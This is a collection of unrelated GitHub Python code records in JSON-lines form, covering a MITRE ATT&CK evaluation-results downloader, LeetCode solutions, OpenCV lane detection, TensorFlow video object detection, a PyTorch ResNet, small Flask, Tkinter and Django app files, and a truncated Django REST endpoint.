['TrendMicro','Bitdefender', 'CheckPoint', 'Cisco', 'CrowdStrike', 'Cybereason', 'CyCraft', 'Cylance',\r\n           'Cynet', 'Deepinstinct', 'Elastic','ESET', 'Fidelis', 'FireEye', 'Fortinet','f-secure', 'Malwarebytes',\r\n           'McAfee', 'Microsoft', 'PaloAltoNetworks', 'Qualys', 'Rapid7', 'ReaQta', 'SentinelOne', 'Somma',\r\n           'Sophos', 'Symantec', 'AhnLab', 'Uptycs', 'VMware']\r\n\r\ndef getResults(v):\r\n    print(v+suffix)\r\n    r_file = requests.get(base_url + v + suffix, verify=False)\r\n    json_data = json.loads(r_file.text)\r\n    with open('data/' + v+filesuffix, 'w', encoding='utf-8') as f:\r\n        json.dump(json_data, f, ensure_ascii=False, indent=4)\r\n\r\ndef downloadRawData():\r\n    
for vendor in vendors:\r\n        getResults(vendor)\r\n\r\ndef buildSummary():\r\n    # build a summary in an excel sheet\r\n    wb = Workbook()\r\n    sh = wb.active\r\n    # set the columns names\r\n    sh['A1'] = \"Participant\"\r\n    cols = ['Total_Substeps', 'Total_Detections',\r\n            'Analytic_Detections', 'Telemetry_Detections','Analytic_Coverage','Telemetry_Coverage','Visibility']\r\n    col_start = 2\r\n    for i in range(0, len(cols)):\r\n        sh.cell(1, col_start+i).value = cols[i]\r\n    sh.cell(1, col_start + i +1).value = \"Linux Capability\"\r\n    sh.cell(1, col_start + i + 2).value = \"Protection Capability\"\r\n    sh.cell(1, col_start + i + 3).value = \"Analytic Coverage %\"\r\n    sh.cell(1, col_start + i + 4).value = \"Telemetry Coverage %\"\r\n    sh.cell(1, col_start + i + 5).value = \"Visibility %\"\r\n\r\n    # now get the vendor summary data in the sheet\r\n    row = 2\r\n    red_text = Font(color=\"00FF0000\")\r\n    for vendor in vendors:\r\n        print(vendor) # just to see it's processing or crashing\r\n\r\n        with open('data/' + vendor+filesuffix, encoding='utf-8') as f:\r\n            data = json.load(f)\r\n            icol = 1\r\n            i = 1\r\n            # Participant = vendor\r\n            sh.cell(row, icol).value = data[0]['Participant_Name']\r\n            # get the summary data under Aggregates\r\n            for col in cols:\r\n                sh.cell(row,icol + i).value = data[0]['Adversaries'][0]['Aggregate_Data']['Aggregates'][col]\r\n                i=i+1\r\n            # Add the capabilities.\r\n            if 'Linux Capability' in data[0]['Adversaries'][0]['Participant_Capabilities']:\r\n                sh.cell(row, icol + i).value = \"Yes\"\r\n            else:\r\n                sh.cell(row, icol + i).value = \"No\"\r\n                sh.cell(row, icol + i).font = red_text\r\n\r\n            if 'Protection Capability' in data[0]['Adversaries'][0]['Participant_Capabilities']:\r\n                sh.cell(row, icol + i +1 ).value = \"Yes\"\r\n            else:\r\n                sh.cell(row, icol + i + 1).value = \"No\"\r\n                sh.cell(row, icol + i + 1).font = red_text\r\n            # Add the %\r\n            percent_analytics = float(data[0]['Adversaries'][0]['Aggregate_Data']['Aggregates'][\"Analytic_Coverage\"]) * 100 # float() instead of eval(): safer and equivalent for numeric strings\r\n            sh.cell(row, icol + i + 2).value = percent_analytics\r\n\r\n            percent_telemetry = float(data[0]['Adversaries'][0]['Aggregate_Data']['Aggregates'][\"Telemetry_Coverage\"]) * 100\r\n            sh.cell(row, icol + i + 3).value = percent_telemetry\r\n\r\n            percent_visibility = float(data[0]['Adversaries'][0]['Aggregate_Data']['Aggregates'][\"Visibility\"]) * 100\r\n            sh.cell(row, icol + i + 4).value = percent_visibility\r\n            f.close()\r\n            row=row +1\r\n\r\n    # add your improvements, like creating charts\r\n\r\n    # change the name to whatever you like\r\n    wb.save('data/wizard-spider-sandworm.xlsx')\r\n\r\n# simple : download and build summary.\r\ndownloadRawData()\r\nbuildSummary()\r\n# add your steps here... 
pandas maybe, or upload JSON's to Elastic\r\n\r\n","repo_name":"girdav01/utils","sub_path":"mitre_results2022.py","file_name":"mitre_results2022.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"11016002506","text":"class Solution:\n    def reachNumber(self, target):\n        \"\"\"\n        :type target: int\n        :rtype: int\n        honestly I did not quite understand what this problem means\n        ??\n        \"\"\"\n        if target == 0:\n            return 0\n\n        if target < 0:\n            target = abs(target)\n\n        total_length =0\n        i = 0\n        while(total_length < target):\n            i += 1\n            total_length += i\n\n        # if step i lands exactly on the target position, i - 1 is needed (because the for loop added 1 extra)\n        # if at step i we overshot by an odd amount, two more steps are needed\n        # if at step i we overshot by an even amount, one more step is needed\n        if total_length == target:\n            return i\n\n        else:\n\n            delta = total_length - target\n            if delta % 2 == 0:\n                return i\n            else:\n                if i % 2 == 0:\n                    return i+1\n                else:\n                    return i + 2\n\n\n\n    def xx(self,num):\n        import math\n        print((math.sqrt(8.00*abs(num)+1)-1)/2)\n        print(math.ceil((math.sqrt(8.00*abs(num)+1)-1)/2))\n\n\ns = Solution()\nprint(s.reachNumber(4))\nprint(s.xx(4))","repo_name":"NeilWangziyu/Leetcode_py","sub_path":"reachNumber.py","file_name":"reachNumber.py","file_ext":"py","file_size_in_byte":1161,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7891798846","text":"from Utils import SCORES_FILE_NAME\n\nfrom flask import Flask\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef score_server():\n    try:\n        with open(SCORES_FILE_NAME, \"r\") as file:\n            score = file.read()\n        return f\"\"\"\n        \n        \n            Scores Game\n        \n        \n        

    The score is
    {score}

    \n \n \n \"\"\"\n except FileNotFoundError:\n return \"\"\"\n \n \n Scores Game\n \n \n

    ERROR

    \n        \n        \n        \"\"\"\n\n\nif __name__ == \"__main__\":\n    app.run()\n","repo_name":"vitalydono/world-of-games","sub_path":"MainScores.py","file_name":"MainScores.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"74950264726","text":"import os\nweight = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2]\ntable = ['1', '0', 'x', '9', '8', '7', '6', '5', '4', '3', '2']\n\nid_num = input(\"Please input your ID number: \")\n\nsum = 0\nfor i, num in enumerate(id_num):\n    if i >= len(weight):\n        break\n    sum += int(num) * weight[i]\n\nhash_num = table[sum % 11]\nprint('The hash num is: ', hash_num)\nos.system('pause')","repo_name":"thekips/tools","sub_path":"utils/idcard_hash.py","file_name":"idcard_hash.py","file_ext":"py","file_size_in_byte":382,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"13735581832","text":"'''\nQuestion: \n    142. Linked List Cycle II\n\nDescription: \n    Given a linked list, return the node where the cycle begins. If there is no cycle, return null.\n    To represent a cycle in the given linked list, we use an integer pos which represents the position (0-indexed) in the linked list where tail connects to. \n    If pos is -1, then there is no cycle in the linked list. Note: Do not modify the linked list.\n\nExample:\n\n    1.Input: head = [3,2,0,-4], pos = 1\n\tOutput: tail connects to node index 1\n\tExplanation: There is a cycle in the linked list, where tail connects to the second node.\n\n    2.Input: head = [1,2], pos = 0\n\tOutput: tail connects to node index 0\n\tExplanation: There is a cycle in the linked list, where tail connects to the first node.\n\n    3.Input: head = [1], pos = -1\n\tOutput: no cycle\n\tExplanation: There is no cycle in the linked list.\n'''\n\n#Python code\n\n# Definition for singly-linked list.\n# class ListNode(object):\n#     def __init__(self, x):\n#         self.val = x\n#         self.next = None\n\nclass Solution(object):\n    def detectCycle(self, head):\n        \"\"\"\n        :type head: ListNode\n        :rtype: ListNode\n        \"\"\"\n        #Solution\n        #https://www.cnblogs.com/zuoyuan/p/3701877.html\n        #Idea: this problem is interesting. First use the fast/slow pointer trick: if the fast pointer and the slow pointer meet, the linked list contains a cycle.\n        #After fast and slow meet, keep fast where it is, move slow back to head, then advance slow and fast together,\n        #except that this time both pointers move one step at a time. The node where the two pointers meet is the start of the cycle.\n        #Why it works: let K be the distance from head to the cycle start, M the distance from the cycle start to the meeting point, and L the length of the cycle.\n        #Suppose that when fast and slow meet, fast has travelled Lfast and slow has travelled Lslow. By the setup:\n        #Lslow = K + M; Lfast = K + M + n * L (n a positive integer); Lfast = 2 * Lslow\n        #It follows that Lslow = n*L and K = n*L - M. So when slow goes back to head while fast stays at the meeting point, and both move forward one node per step,\n        #slow walks K from head to the cycle start, and fast, starting from the meeting point, also walks K. Where does fast end up after walking K? Since K = (n-1)*L + (L-M), #fast makes n-1 full laps and then walks L-M more, also arriving at the cycle start. That is how the start is found.\n        if head == None or head.next == None:\n            return None\n        slow = fast = head\n        while fast and fast.next:\n            slow = slow.next\n            fast = fast.next.next\n            if fast == slow:\n                break\n        if slow == fast:\n            slow = head\n            while slow != fast:\n                slow = slow.next\n                fast = fast.next\n            return slow\n        return None\n\n    ","repo_name":"ChenxiiCheng/Python-LC-Solution","sub_path":"Q142-Linked List Cycle ||-Medium.py","file_name":"Q142-Linked List Cycle ||-Medium.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"8152328037","text":"from GUI.input_name import *\n\n\nclass basedesk():\n    def __init__(self, master):\n        self.root = master\n        self.root.config()\n        self.root.title(\"Snake and Ladder\")\n        self.root.geometry(\"1000x800+0+0\")  # 1000 width, 800 height\n        
self.root.resizable(False, False)  # window cannot be resized by dragging\n        NameEntryForm(self.root)\n\n\nif __name__ == '__main__':\n    root = ttk.Window()\n    basedesk(root)\n    root.mainloop()\n","repo_name":"HaodongYu910/SS_Assignment","sub_path":"GUI/welcom_page.py","file_name":"welcom_page.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"43703341305","text":"import matplotlib.pyplot as plt\nfrom copy import deepcopy\nfrom ecc import Point, EllipticCurve\n# p = Point(5,1)\n# k = 17\n# E = EllipticCurve(a = 2, b = 2, k = k)\n# t_inf = (E.mult(p, 19))\n# # print(E.onCurve(t_inf.x, t_inf.y))\n# # print(E.onCurve(p.x, p.y))\n\n# q = Point(6, 3)\n# q_inf = (E.mult(q, 19))\n# print(E.onCurve(q_inf.x, q_inf.y))\n\nk = 149\nE = EllipticCurve(a = -4, b = 10, k = k)\np = Point(29, 61)\nq = Point(32, 67)\nprint(E)\nprint(\"R : (%s) \" % E.add(p, q))\nprint(\"S : (%s) \" % E.mult(p, 3))\n# print(E.onCurve(p.x, p.y))\nassert(E.onCurve(p.x, p.y) == True) # checks that p is on the elliptic curve\nprint(E.order())\npts = (E.points)\nx = []\ny = []\n\nfor p in pts:\n    print(p.x, p.y)\n    x.append(p.x)\n    y.append(p.y)\n\nplt.scatter(x, y)\nplt.axhline(y=k/2)\nplt.grid()\nplt.show()\n\nplt.close()\n","repo_name":"chinying/compsec-cw1","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23570071192","text":"import numpy as np\r\nimport cv2\r\n\r\n# Reading the input image\r\nimg = cv2.imread(\"C:/Users\\Eslam.Wael\\Desktop/Capture.PNG\")\r\n# Using median filter to make the lane more recognizable\r\nimg = cv2.medianBlur(img, 5)\r\n\r\n# Getting the height and width of the photo\r\nheight, width = img.shape[:2]\r\n\r\n\r\n# Function to return the parking slot region #####################\r\n\r\n\r\ndef parking_slot_region(img, vertices):\r\n\r\n    # defining a blank mask to start with\r\n    mask = np.zeros_like(img)\r\n    \r\n    # defining a 3 channel or 1 channel color to fill the mask with depending on the input image\r\n    if len(img.shape) > 2:\r\n        channel_count = img.shape[2]  # i.e. 
3 or 4 depending on your image\r\n ignore_mask_color = (255,) * channel_count\r\n else:\r\n ignore_mask_color = 255\r\n\r\n # filling pixels inside the polygon defined by \"vertices\" with the fill color\r\n cv2.fillPoly(mask, vertices, ignore_mask_color)\r\n\r\n # returning the image only where mask pixels are nonzero\r\n masked_image = cv2.bitwise_and(img, mask)\r\n return masked_image\r\n\r\n# Function to detect the yellow lanes in the photo #####################\r\n\r\ndef detect_yellow (img):\r\n lower_range_yellow = np.array([22, 60, 200])\r\n upper_range_yellow = np.array([60, 255, 255])\r\n #kernel = np.ones((5,5),np.uint8)\r\n\r\n # Convert to HSV\r\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)\r\n mask = cv2.inRange(hsv, lower_range_yellow, upper_range_yellow)\r\n\r\n # Remove the detected vertical lines\r\n kernel = np.array([0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0], np.uint8)\r\n mask = cv2.erode(mask, kernel, iterations=6)\r\n\r\n # Return vertical lines\r\n kernel = np.array([0, 0, 1, 0, 1, 0, 1, 0, 0], np.uint8)\r\n #mask=cv2.dilate(mask,kernel,iterations=3)\r\n edges = cv2.Canny(mask, 100, 200)\r\n edges = cv2.dilate(edges, kernel, iterations=1)\r\n _, contours, hierarchy = cv2.findContours(edges, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\r\n cv2.drawContours(edges, contours, -1, (255, 255, 255), 3)\r\n output = cv2.bitwise_and(img, img, mask=mask)\r\n return mask, output, edges\r\n\r\n\r\n# Function to detect the white lanes in the photo #####################\r\n\r\n\r\ndef detect_white (img):\r\n\r\n # HSV ranges for White\r\n lower_range_white = np.array([0, 210, 0])\r\n upper_range_white = np.array([255, 255, 255])\r\n\r\n # Convert to HSV\r\n hsv = cv2.cvtColor(img, cv2.COLOR_BGR2HLS)\r\n mask = cv2.inRange(hsv, lower_range_white, upper_range_white)\r\n\r\n # Remove detected vertical lines\r\n kernel = np.array([0, 0, 0, 1, 1, 1, 0, 0, 0], np.uint8)\r\n mask= cv2.erode(mask, kernel, iterations=6)\r\n\r\n # Return vertical lines\r\n kernel = np.array([0, 0, 1, 0, 1, 0, 1, 0, 0], np.uint8)\r\n #mask=cv2.dilate(mask,kernel,iterations=3)\r\n edges = cv2.Canny(mask, 100, 200)\r\n edges = cv2.dilate(edges, kernel, iterations=1)\r\n _, contours, hierarchy = cv2.findContours(edges,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE) \r\n cv2.drawContours(edges, contours, -1, (255, 255, 255), 3)\r\n output = cv2.bitwise_and(img, img, mask=mask)\r\n return mask, output, edges\r\n\r\n\r\n# Function to return the coordinates of the 2 parking slot lines #####################\r\n\r\n\r\ndef getFourPoints (edges):\r\n\r\n y = edges.nonzero()[0]\r\n x = edges.nonzero()[1]\r\n\r\n y_min = y[np.argmin(y)]\r\n x_y_min = x[np.argmin(y)]\r\n \r\n y_max = y[np.argmax(y)]\r\n x_y_max = x[np.argmax(y)]\r\n \r\n # Third point\r\n y_x_min = y[np.argmin(x)]\r\n x_min = x[np.argmin(x)]\r\n third = np.array([y_x_min, x_min])\r\n \r\n # Last point\r\n y_x_max = y[np.argmax(x)]\r\n x_max = x[np.argmax(x)]\r\n forth = np.array([y_x_max,x_max])\r\n \r\n if abs(x_y_min - x_min) < abs(x_y_min - x_max):\r\n first = np.array([y_min, x_y_min])\r\n second = np.array([y_min, x_max-(abs(x_y_min-x_min))])\r\n else:\r\n first = np.array([y_min, x_min+(abs(x_y_min-x_max))])\r\n second = np.array([y_min, x_y_min])\r\n\r\n return first, second, third, forth\r\n\r\n\r\nmask_yellow, output_yellow, edges = detect_yellow(img)\r\nmask_white, output_white, edges2 = detect_white(img)\r\nedges = cv2.bitwise_or(edges, edges2)\r\n\r\n# Getting the coordinates of the 2 parking slot lines\r\nfirst, second, third, forth = 
getFourPoints(edges)\r\n# Define the parking slot \"Our region of interest\"\r\n\r\nparking_slot = [\r\n (0, height),\r\n (first[1], first[0]),\r\n (second[1], second[0]),\r\n (width, height)\r\n]\r\n\r\ncropped_image = parking_slot_region(\r\n img,\r\n np.array([parking_slot], np.int32),\r\n)\r\n\r\ncv2.imshow('cropped_imag', cropped_image)\r\ncv2.imshow(\"images with yellow lanes\", np.hstack([cropped_image, output_yellow, output_white]))\r\ncv2.imshow('mask', mask_yellow)\r\n#cv2.imshow('mask2', mask_white)\r\ncv2.imshow('edges', edges)\r\n#cv2.imshow('edges2', edges2)\r\n\r\ncv2.waitKey(0)\r\ncv2.destroyAllWindows()","repo_name":"eslamwael/Parking-Detection-with-digital-image-processing-","sub_path":"Parking detection with computer vision/Early modules/LaneDetection.py","file_name":"LaneDetection.py","file_ext":"py","file_size_in_byte":4813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"25685624302","text":"import tkinter as tk\n\nfrom tkinter import messagebox\n# using Pillow library for importing images from the system\nfrom PIL import ImageTk\nfrom tkinter import *\nimport time\n\nimport dbFun\nimport employee\n\n# storing not so easy string to remember in a variable so that it can be reusable\nbg_color = '#363636'\n\"\"\"\n#function for clearing the widgets\ndef clear_widgets(frame):\n #selecting all widgets within the frame\n for widget in frame.winfo_children():\n widget.destroy()\n\"\"\"\n\n\n# initialization\ndef config(window):\n window.title('ShareBike | Move - Operator')\n # window.eval(\"tk::PlaceWindow . center\")\n # taking the half of whatever screen this code would be running on\n width = window.winfo_screenwidth() // 2\n # would leave a 10% of gap from the top and bottom of the screen\n height = int(window.winfo_screenheight() * 0.1)\n # Setting the actual geometry now\n window.geometry('400x600+' + str(width) + '+' + str(height))\n\n main_frame = tk.Frame(window, width=400, height=600, bg=bg_color)\n view_report_frame = tk.Frame(window, bg=bg_color)\n\n for frame in (main_frame, view_report_frame):\n frame.grid(row=0, column=0)\n\n # initializing the main_frame\n def load_main_frame():\n main_frame.pack_propagate(\n False) # using a function which would prevent the child label element to affect the parent frame element\n # main_frame widgets\n main_logo = ImageTk.PhotoImage(file=\"ShareBike.png\")\n logo_widget = tk.Label(main_frame, image=main_logo, bg=bg_color, height=250, width=250)\n logo_widget.image = main_logo\n logo_widget.pack()\n\n # adding texts in the main_widget\n tk.Label(\n main_frame,\n text=\"Move a bike!\",\n bg=bg_color,\n fg=\"white\", # text color\n font=('TkMenuFont', 14)\n ).pack(pady=20) # pady is used to create a padding along the y axis\n\n tk.Label(\n main_frame,\n text=\"Select Vehicle ID -- Location\",\n bg=bg_color,\n fg=\"white\",\n ).place(x=130, y=320)\n\n selected_option = populate_dropdown(main_frame)\n\n tk.Label(\n main_frame,\n text=\"Select Location to Move\",\n bg=bg_color,\n fg=\"white\",\n ).place(x=130, y=380)\n\n location_selected = populate_dropdown_location(selected_option, main_frame)\n\n # Move Button\n tk.Button(\n main_frame,\n text='Move',\n font=(\"TkHeadingFont\", 10),\n bg='#191919',\n fg='white',\n activebackground='#000000',\n activeforeground='white',\n command=lambda: move_button(selected_option, location_selected)\n ).place(x=180, y=470)\n\n def populate_dropdown(move_vehicle_window):\n # selection = name_box.curselection()\n # print(selection)\n 
# print(name_box.get(selection[0]))\n # fetched_string_array = name_box.get(selection[0]).split(\"---\")\n # current_location = fetched_string_array[1]\n filtered_location = []\n vehicle_dtls = employee.track_vehicle()\n for vehicle_id, vehicle_dtls in vehicle_dtls.items():\n if vehicle_dtls[2] == 'VACANT':\n total_info = str(vehicle_id) + \"---\" + vehicle_dtls[3]\n filtered_location.append(total_info)\n clicked = StringVar(move_vehicle_window)\n if len(filtered_location) < 1:\n filtered_location.append(\"No Vehicle\")\n clicked.set(filtered_location[0])\n drop = OptionMenu(move_vehicle_window, clicked, *filtered_location)\n drop.place(x=130, y=345, width=\"150\")\n if filtered_location[0] == \"No Vehicle\":\n drop.configure(state=\"disabled\")\n return clicked\n\n def populate_dropdown_location(selected_vehicle, move_vehicle_window):\n selection = selected_vehicle.get()\n fetched_string_array = selection.split(\"---\")\n current_location = fetched_string_array[1]\n location_dct = employee.fetch_all_location_info_in_dict()\n filtered_location = []\n for key, value in location_dct.items():\n if value != current_location:\n filtered_location.append(value)\n clicked = StringVar(move_vehicle_window)\n clicked.set(\"Select Location\")\n drop = OptionMenu(move_vehicle_window, clicked, *filtered_location)\n drop.place(x=130, y=410, width=\"150\")\n\n def on_selected_location(name, index, mode):\n drop['menu'].delete(0, END)\n filtered_location.clear()\n selection = selected_vehicle.get()\n fetched_string_array = selection.split(\"---\")\n current_location = fetched_string_array[1]\n\n for item in location_dct.values():\n if item != current_location:\n filtered_location.append(item)\n\n for location in filtered_location:\n drop['menu'].add_command(label=location, command=lambda v=location: clicked.set(v))\n\n selected_vehicle.trace(\"w\", on_selected_location)\n\n return clicked\n\n def move_button(selected_vehicle, selected_loc):\n selected_location = selected_loc.get()\n selection = selected_vehicle.get()\n fetched_string_array = selection.split(\"---\")\n vehicle_id = fetched_string_array[0]\n location_id = dbFun.get_loc_id(selected_location)\n employee.move(vehicle_id, location_id)\n # location_dct = employee.fetch_all_location_info_in_dict()\n # location = find_location_id(location_dct, fetched_string_array[1])\n # time1 = time.time()\n # employee.update_vehicle_charge(vehicle_id, time1, \"VACANT\", location)\n messagebox.showinfo(\"Vehicle location changed\", \"Vehicle moved from \" + selection + \" to \" + selected_location)\n\n load_main_frame()\n","repo_name":"Basket-Fatty/ShareBike","sub_path":"sharebike_operator_move.py","file_name":"sharebike_operator_move.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"28475568638","text":"import numpy as np\nimport cv2\nimport os\n\nimport object_detection as obj\n\n#test_videos information\nPATH_TO_TEST_VIDEO_DIR = \"cnn_class2_videos\"\nTEST_VIDEO_FILE = \"test\"\nTEST_VIDEO_PATH = os.path.join(PATH_TO_TEST_VIDEO_DIR,\"{}.mp4\".format(TEST_VIDEO_FILE))\n\n#video detection\nread = cv2.VideoCapture(TEST_VIDEO_PATH)\nif read.isOpened():\n print (\"read_success\")\n fps = int(read.get(cv2.CAP_PROP_FPS))\n width = int(read.get(cv2.CAP_PROP_FRAME_WIDTH))\n height = int(read.get(cv2.CAP_PROP_FRAME_HEIGHT))\n size = (width,height)\n write = cv2.VideoWriter(\"{}.avi\".format(TEST_VIDEO_FILE),cv2.VideoWriter_fourcc('M','J','P','G'),5,size,True)\n\nif 
write.isOpened():\n print (\"write_success\") \n\nwhile(1):\n check,frame_np = read.read()\n if (check==False):\n break\n else:\n frame_np_expanded = np.expand_dims(frame_np, axis=0)\n output_dict = obj.run_inference_for_single_image(frame_np, obj.detection_graph)\n obj.vis_util.visualize_boxes_and_labels_on_image_array(\n frame_np,\n output_dict['detection_boxes'],\n output_dict['detection_classes'],\n output_dict['detection_scores'],\n obj.category_index,\n instance_masks=output_dict.get('detection_masks'),\n use_normalized_coordinates=True,\n line_thickness=2)\n write.write(frame_np) \n","repo_name":"len6704/Object-Detection","sub_path":"video_detection.py","file_name":"video_detection.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70304766169","text":"# !/usr/bin/env python\n# -*-coding:utf-8 -*-\n\n\"\"\"\n# File : resnet.py\n# Author :CodeCat\n# version :python 3.7\n# Software :Pycharm\n\"\"\"\nimport os\n\nimport torch\nimport torch.nn as nn\nimport torch.utils.model_zoo as model_zoo\n\n\nmodel_urls = {\n 'resnet50': 'http://sceneparsing.csail.mit.edu/model/pretrained_resnet/resnet50-imagenet.pth',\n}\n\n\ndef conv3x3(in_channels, out_channels, stride=1):\n return nn.Conv2d(in_channels, out_channels, kernel_size=3, stride=stride, padding=1, bias=False)\n\n\nclass Bottleneck(nn.Module):\n expansion = 4\n\n def __init__(self, in_channels, out_channels, stride=1, downsample=None):\n super(Bottleneck, self).__init__()\n self.conv1 = nn.Conv2d(in_channels, out_channels, kernel_size=1, bias=False)\n self.bn1 = nn.BatchNorm2d(out_channels)\n self.conv2 = nn.Conv2d(out_channels, out_channels, kernel_size=3, stride=stride, padding=1, bias=False)\n self.bn2 = nn.BatchNorm2d(out_channels)\n self.conv3 = nn.Conv2d(out_channels, out_channels * 4, kernel_size=1, bias=False)\n self.bn3 = nn.BatchNorm2d(out_channels * 4)\n self.relu = nn.ReLU(inplace=True)\n self.downsample = downsample\n self.stride = stride\n\n def forward(self, x):\n residual = x\n\n out = self.conv1(x)\n out = self.bn1(out)\n out = self.relu(out)\n\n out = self.conv2(out)\n out = self.bn2(out)\n out = self.relu(out)\n\n out = self.conv3(out)\n out = self.bn3(out)\n\n if self.downsample is not None:\n residual = self.downsample(x)\n\n out += residual\n out = self.relu(out)\n return out\n\n\nclass ResNet(nn.Module):\n def __init__(self, block, layers, num_classes=1000):\n self.in_channels = 128\n super(ResNet, self).__init__()\n self.conv1 = conv3x3(3, 64, stride=2)\n self.bn1 = nn.BatchNorm2d(64)\n self.relu1 = nn.ReLU(inplace=True)\n self.conv2 = conv3x3(64, 64)\n self.bn2 = nn.BatchNorm2d(64)\n self.relu2 = nn.ReLU(inplace=True)\n self.conv3 = conv3x3(64, 128)\n self.bn3 = nn.BatchNorm2d(128)\n self.relu3 = nn.ReLU(inplace=True)\n self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)\n\n self.layer1 = self._make_layer(block, 64, layers[0])\n self.layer2 = self._make_layer(block, 128, layers[1], stride=2)\n self.layer3 = self._make_layer(block, 256, layers[2], stride=2)\n self.layer4 = self._make_layer(block, 512, layers[3], stride=2)\n self.avgpool = nn.AvgPool2d(7, stride=1)\n self.fc = nn.Linear(512 * block.expansion, num_classes)\n\n def _make_layer(self, block, channels, block_nums, stride=1):\n downsample = None\n if stride != 1 or self.in_channels != channels * block.expansion:\n downsample = nn.Sequential(\n nn.Conv2d(self.in_channels, channels * block.expansion, kernel_size=1, stride=stride, 
bias=False),\n                nn.BatchNorm2d(channels * block.expansion)\n            )\n\n        layers = []\n        layers.append(block(self.in_channels, channels, stride, downsample))\n        self.in_channels = channels * block.expansion\n        for i in range(1, block_nums):\n            layers.append(block(self.in_channels, channels))\n\n        return nn.Sequential(*layers)\n\n    def forward(self, x):\n        x = self.relu1(self.bn1(self.conv1(x)))\n        x = self.relu2(self.bn2(self.conv2(x)))\n        x = self.relu3(self.bn3(self.conv3(x)))\n        x = self.maxpool(x)\n\n        x = self.layer1(x)\n        x = self.layer2(x)\n        x = self.layer3(x)\n        x = self.layer4(x)\n\n        x = self.avgpool(x)\n        x = x.view(x.size(0), -1)\n        x = self.fc(x)\n        return x\n\n\ndef load_url(url, model_dir='./model_data', map_location=None):\n    if not os.path.exists(model_dir):\n        os.makedirs(model_dir)\n    filename = url.split('/')[-1]\n    cached_file = os.path.join(model_dir, filename)\n    if os.path.exists(cached_file):\n        return torch.load(cached_file, map_location=map_location)\n    else:\n        return model_zoo.load_url(url, model_dir=model_dir)\n\n\ndef resnet50(pretrained=False, **kwargs):\n    model = ResNet(Bottleneck, (3, 4, 6, 3), **kwargs)\n    if pretrained:\n        model.load_state_dict(load_url(model_urls['resnet50']), strict=False)\n    return model","repo_name":"codecat0/CV","sub_path":"Semantic_Segmentation/PSPNet/nets/resnet.py","file_name":"resnet.py","file_ext":"py","file_size_in_byte":4348,"program_lang":"python","lang":"en","doc_type":"code","stars":140,"dataset":"github-code","pt":"31"} +{"seq_id":"73592874649","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.test import TestCase\nfrom django.shortcuts import render_to_response,HttpResponse\nfrom Pet.models import Guy,sort\nfrom PIL import Image\n# Create your tests here.\ndef op(request):\n    for i in range(10):\n        user=Guy()\n        user.username=\"Beijing user\"+str(i+11)\n        user.phone=i\n        user.city=\"Beijing\"\n        user.address=\"Ligong dorm #\"+str(i+11)\n        user.experience=\"under 1 year\"\n        #user.seed=\"cat\"\n        user.seed=\"dog\"\n        user.price=\"under 100/day\"\n        user.information=\"###\"\n        user.animal_info=\"###\"\n        user.quantity=0\n        user.picture=\"\\static\\images\\e\"+str(i)+\".jpg\"\n        user.score=-1\n        user.save()\n    return HttpResponse(\"

    Registration successful!

    \")\n\ndef op2(request):\n for i in range(20):\n sort1=sort()\n sort1.username=\"上海用户\"+str(i+1)\n sort1.flag=0\n sort1.save()\n return HttpResponse(\"

    Registration successful

    \")\n\n#im = Image.open('C:/Users/leibn/Documents/Django Projects/Django0427/Pet/static/images/UserhomeImages/768798.jpg')\n#image_resized = im.resize((480,280), Image.ANTIALIAS)\n#image_resized.save('C:/Users/leibn/Documents/Django Projects/Django0427/Pet/static/images/UserhomeImages/768798.jpg', 'jpeg')\n\n#这是在Github上进行的尝试.\n","repo_name":"LeibnizWang/Pet-Website","sub_path":"DjangoProject/Pet/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33628973889","text":"# REST Framework imports\nfrom rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\n# Roles and permissions\nfrom rolepermissions.decorators import has_permission_decorator\n# Models\nfrom task_server.models import IncidenceComment\n# Serializers\nfrom task_server.api.serializers.comments.index import IncidenceCommentSerializer, IncidenceCommentReadOnlySerializer\n# Utils\nfrom auth_server.utils.decodeJWT import decodeJWT\nfrom datetime import datetime as dt\n\n\n@api_view(['POST'])\n@has_permission_decorator('add_comment')\ndef createIncidenceComment(request):\n try:\n token = decodeJWT(request)\n if (token['is_admin'] and token['company_id'] == request.data['company']) \\\n or (token['company_id'] == request.data['company'] and token['roles'].count('manager') == 1):\n serializer = IncidenceCommentSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response({'data': serializer.data}, status=status.HTTP_201_CREATED)\n else:\n return Response({'error': serializer.errors}, status=status.HTTP_400_BAD_REQUEST)\n else:\n return Response({'error': 'You are not authorized to access this 